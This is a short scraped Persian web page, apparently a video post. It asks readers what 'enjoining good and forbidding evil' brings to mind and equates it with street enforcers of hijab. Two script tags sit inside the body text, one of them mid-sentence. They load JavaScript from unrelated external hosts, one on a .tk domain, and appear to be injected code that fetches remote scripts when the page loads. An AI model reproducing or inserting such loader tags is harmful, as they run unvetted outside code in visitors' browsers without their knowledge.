امر به معروف یعنی گیرایی که تو خیابون به حجاب میدن !!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>وقتی اسم "امر به معروف و نهی از منکر" را میشنوی، اولین چیزی که به یادش میفتی چیه؟<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
3

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر